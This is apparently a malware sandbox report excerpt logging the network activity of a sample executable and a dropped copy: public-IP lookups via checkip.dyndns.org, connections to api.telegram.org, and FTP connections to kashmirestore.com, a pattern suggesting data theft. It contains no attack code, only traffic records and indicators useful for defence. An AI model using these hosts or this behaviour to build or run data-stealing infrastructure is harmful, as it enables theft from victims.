                                                                                                                          Dec 5, 2024 18:51:34.321181059 CET49776443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:34.321216106 CET44349776104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:34.675859928 CET44349775104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:34.675936937 CET44349775104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:34.676105022 CET49775443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:34.676639080 CET49775443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:34.680212021 CET4977280192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:34.681411028 CET4978180192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:34.762980938 CET44349776104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:34.763051033 CET44349776104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:34.763139009 CET49776443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:34.763758898 CET49776443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:34.767287016 CET4977380192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:34.768501043 CET4978280192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:34.800678968 CET8049772132.226.8.169192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:34.800812960 CET4977280192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:34.801373959 CET8049781132.226.8.169192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:34.801456928 CET4978180192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:34.801732063 CET4978180192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:34.887770891 CET8049773132.226.8.169192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:34.887845993 CET4977380192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:34.888216019 CET8049782132.226.8.169192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:34.888294935 CET4978280192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:34.888676882 CET4978280192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:34.921631098 CET8049781132.226.8.169192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:35.008692026 CET8049782132.226.8.169192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:36.251034975 CET8049781132.226.8.169192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:36.252573967 CET49788443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:36.252641916 CET44349788104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:36.252722025 CET49788443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:36.253031969 CET49788443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:36.253046036 CET44349788104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:36.293298960 CET4978180192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:36.586668015 CET8049782132.226.8.169192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:36.588126898 CET49789443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:36.588165998 CET44349789104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:36.588246107 CET49789443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:36.588510036 CET49789443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:36.588524103 CET44349789104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:36.637073994 CET4978280192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:37.486437082 CET44349788104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:37.488445044 CET49788443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:37.488475084 CET44349788104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:37.817297935 CET44349789104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:37.819346905 CET49789443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:37.819374084 CET44349789104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:37.951504946 CET44349788104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:37.951594114 CET44349788104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:37.951693058 CET49788443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:37.952168941 CET49788443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:37.969260931 CET4978180192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:38.089660883 CET8049781132.226.8.169192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:38.089947939 CET4978180192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:38.106854916 CET49795443192.168.2.7149.154.167.220
                                                                                                                          Dec 5, 2024 18:51:38.106888056 CET44349795149.154.167.220192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:38.106947899 CET49795443192.168.2.7149.154.167.220
                                                                                                                          Dec 5, 2024 18:51:38.107388020 CET49795443192.168.2.7149.154.167.220
                                                                                                                          Dec 5, 2024 18:51:38.107404947 CET44349795149.154.167.220192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:38.347378016 CET44349789104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:38.347445011 CET44349789104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:38.347485065 CET49789443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:38.348022938 CET49789443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:38.352210045 CET4978280192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:38.353712082 CET4979680192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:38.473659039 CET8049782132.226.8.169192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:38.473850012 CET4978280192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:38.474744081 CET8049796132.226.8.169192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:38.474802971 CET4979680192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:38.474967957 CET4979680192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:38.594759941 CET8049796132.226.8.169192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:39.480727911 CET44349795149.154.167.220192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:39.480856895 CET49795443192.168.2.7149.154.167.220
                                                                                                                          Dec 5, 2024 18:51:39.484164000 CET49795443192.168.2.7149.154.167.220
                                                                                                                          Dec 5, 2024 18:51:39.484179020 CET44349795149.154.167.220192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:39.484451056 CET44349795149.154.167.220192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:39.486058950 CET49795443192.168.2.7149.154.167.220
                                                                                                                          Dec 5, 2024 18:51:39.531328917 CET44349795149.154.167.220192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:39.896976948 CET8049796132.226.8.169192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:39.898432016 CET49799443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:39.898463964 CET44349799104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:39.898525000 CET49799443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:39.898745060 CET49799443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:39.898756027 CET44349799104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:39.949532986 CET4979680192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:40.000572920 CET44349795149.154.167.220192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:40.000655890 CET44349795149.154.167.220192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:40.000718117 CET49795443192.168.2.7149.154.167.220
                                                                                                                          Dec 5, 2024 18:51:40.005368948 CET49795443192.168.2.7149.154.167.220
                                                                                                                          Dec 5, 2024 18:51:41.122667074 CET44349799104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:41.124397993 CET49799443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:41.124423027 CET44349799104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:41.578768969 CET44349799104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:41.578841925 CET44349799104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:41.578891993 CET49799443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:41.579474926 CET49799443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:41.585194111 CET4979680192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:41.586730957 CET4980380192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:41.705322981 CET8049796132.226.8.169192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:41.705419064 CET4979680192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:41.706490993 CET8049803132.226.8.169192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:41.706643105 CET4980380192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:41.706737995 CET4980380192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:41.826605082 CET8049803132.226.8.169192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:43.116957903 CET8049803132.226.8.169192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:43.121042013 CET49809443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:43.121078968 CET44349809104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:43.121155024 CET49809443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:43.121484995 CET49809443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:43.121495008 CET44349809104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:43.168477058 CET4980380192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:44.400017023 CET44349809104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:44.401472092 CET49809443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:44.401488066 CET44349809104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:44.852453947 CET44349809104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:44.852518082 CET44349809104.21.67.152192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:44.852817059 CET49809443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:44.853105068 CET49809443192.168.2.7104.21.67.152
                                                                                                                          Dec 5, 2024 18:51:44.862778902 CET4980380192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:44.863692045 CET49815443192.168.2.7149.154.167.220
                                                                                                                          Dec 5, 2024 18:51:44.863734007 CET44349815149.154.167.220192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:44.863797903 CET49815443192.168.2.7149.154.167.220
                                                                                                                          Dec 5, 2024 18:51:44.864244938 CET49815443192.168.2.7149.154.167.220
                                                                                                                          Dec 5, 2024 18:51:44.864259005 CET44349815149.154.167.220192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:44.983223915 CET8049803132.226.8.169192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:44.983551025 CET4980380192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:46.251615047 CET44349815149.154.167.220192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:46.251754045 CET49815443192.168.2.7149.154.167.220
                                                                                                                          Dec 5, 2024 18:51:46.253184080 CET49815443192.168.2.7149.154.167.220
                                                                                                                          Dec 5, 2024 18:51:46.253195047 CET44349815149.154.167.220192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:46.253429890 CET44349815149.154.167.220192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:46.254808903 CET49815443192.168.2.7149.154.167.220
                                                                                                                          Dec 5, 2024 18:51:46.295332909 CET44349815149.154.167.220192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:46.502897978 CET4970880192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:46.774786949 CET44349815149.154.167.220192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:46.774873018 CET44349815149.154.167.220192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:46.774947882 CET49815443192.168.2.7149.154.167.220
                                                                                                                          Dec 5, 2024 18:51:46.777554035 CET49815443192.168.2.7149.154.167.220
                                                                                                                          Dec 5, 2024 18:51:49.568933964 CET4982621192.168.2.7119.18.54.39
                                                                                                                          Dec 5, 2024 18:51:49.688677073 CET2149826119.18.54.39192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:49.688796043 CET4982621192.168.2.7119.18.54.39
                                                                                                                          Dec 5, 2024 18:51:49.763534069 CET4982621192.168.2.7119.18.54.39
                                                                                                                          Dec 5, 2024 18:51:49.885126114 CET2149826119.18.54.39192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:49.885212898 CET4982621192.168.2.7119.18.54.39
                                                                                                                          Dec 5, 2024 18:51:51.280754089 CET4983221192.168.2.7119.18.54.39
                                                                                                                          Dec 5, 2024 18:51:51.400672913 CET2149832119.18.54.39192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:51.400818110 CET4983221192.168.2.7119.18.54.39
                                                                                                                          Dec 5, 2024 18:51:51.401118994 CET4983221192.168.2.7119.18.54.39
                                                                                                                          Dec 5, 2024 18:51:51.522996902 CET2149832119.18.54.39192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:51.523200035 CET4983221192.168.2.7119.18.54.39
                                                                                                                          Dec 5, 2024 18:51:52.142987013 CET4973280192.168.2.7132.226.8.169
                                                                                                                          Dec 5, 2024 18:51:52.574016094 CET4983321192.168.2.7119.18.54.39
                                                                                                                          Dec 5, 2024 18:51:52.694690943 CET2149833119.18.54.39192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:52.694786072 CET4983321192.168.2.7119.18.54.39
                                                                                                                          Dec 5, 2024 18:51:52.695343018 CET4983321192.168.2.7119.18.54.39
                                                                                                                          Dec 5, 2024 18:51:52.818181992 CET2149833119.18.54.39192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:52.818257093 CET4983321192.168.2.7119.18.54.39
                                                                                                                          Dec 5, 2024 18:51:54.202785015 CET4983921192.168.2.7119.18.54.39
                                                                                                                          Dec 5, 2024 18:51:54.322669983 CET2149839119.18.54.39192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:54.322768927 CET4983921192.168.2.7119.18.54.39
                                                                                                                          Dec 5, 2024 18:51:54.323060989 CET4983921192.168.2.7119.18.54.39
                                                                                                                          Dec 5, 2024 18:51:54.443013906 CET2149839119.18.54.39192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:54.443546057 CET4983921192.168.2.7119.18.54.39
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Dec 5, 2024 18:51:08.739025116 CET5655253192.168.2.71.1.1.1
                                                                                                                          Dec 5, 2024 18:51:08.889451027 CET53565521.1.1.1192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:11.011478901 CET5901953192.168.2.71.1.1.1
                                                                                                                          Dec 5, 2024 18:51:11.159205914 CET53590191.1.1.1192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:37.969158888 CET5595453192.168.2.71.1.1.1
                                                                                                                          Dec 5, 2024 18:51:38.106143951 CET53559541.1.1.1192.168.2.7
                                                                                                                          Dec 5, 2024 18:51:48.810275078 CET6330553192.168.2.71.1.1.1
                                                                                                                          Dec 5, 2024 18:51:49.568047047 CET53633051.1.1.1192.168.2.7
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Dec 5, 2024 18:51:08.739025116 CET192.168.2.71.1.1.10x8897Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                          Dec 5, 2024 18:51:11.011478901 CET192.168.2.71.1.1.10xa979Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                          Dec 5, 2024 18:51:37.969158888 CET192.168.2.71.1.1.10xf38Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                          Dec 5, 2024 18:51:48.810275078 CET192.168.2.71.1.1.10x94eStandard query (0)kashmirestore.comA (IP address)IN (0x0001)false
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Dec 5, 2024 18:51:08.889451027 CET1.1.1.1192.168.2.70x8897No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Dec 5, 2024 18:51:08.889451027 CET1.1.1.1192.168.2.70x8897No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                          Dec 5, 2024 18:51:08.889451027 CET1.1.1.1192.168.2.70x8897No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                          Dec 5, 2024 18:51:08.889451027 CET1.1.1.1192.168.2.70x8897No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                          Dec 5, 2024 18:51:08.889451027 CET1.1.1.1192.168.2.70x8897No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                          Dec 5, 2024 18:51:08.889451027 CET1.1.1.1192.168.2.70x8897No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                          Dec 5, 2024 18:51:11.159205914 CET1.1.1.1192.168.2.70xa979No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                          Dec 5, 2024 18:51:11.159205914 CET1.1.1.1192.168.2.70xa979No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                          Dec 5, 2024 18:51:38.106143951 CET1.1.1.1192.168.2.70xf38No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                          Dec 5, 2024 18:51:49.568047047 CET1.1.1.1192.168.2.70x94eNo error (0)kashmirestore.com119.18.54.39A (IP address)IN (0x0001)false
                                                                                                                          • reallyfreegeoip.org
                                                                                                                          • api.telegram.org
                                                                                                                          • checkip.dyndns.org
                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.749703132.226.8.169807308C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 5, 2024 18:51:09.019576073 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 5, 2024 18:51:10.439364910 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:10 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                          Dec 5, 2024 18:51:10.477319002 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Dec 5, 2024 18:51:10.970990896 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:10 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                          Dec 5, 2024 18:51:12.941401958 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Dec 5, 2024 18:51:13.429111958 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:13 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.749708132.226.8.169807308C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 5, 2024 18:51:15.257900000 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Dec 5, 2024 18:51:16.668380976 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:16 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.749714132.226.8.169807728C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 5, 2024 18:51:15.671380997 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 5, 2024 18:51:17.071607113 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:16 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                          Dec 5, 2024 18:51:17.079340935 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Dec 5, 2024 18:51:17.656429052 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:17 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                          Dec 5, 2024 18:51:19.417980909 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Dec 5, 2024 18:51:19.903251886 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:19 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.749722132.226.8.169807308C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 5, 2024 18:51:18.500711918 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 5, 2024 18:51:19.918057919 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:19 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


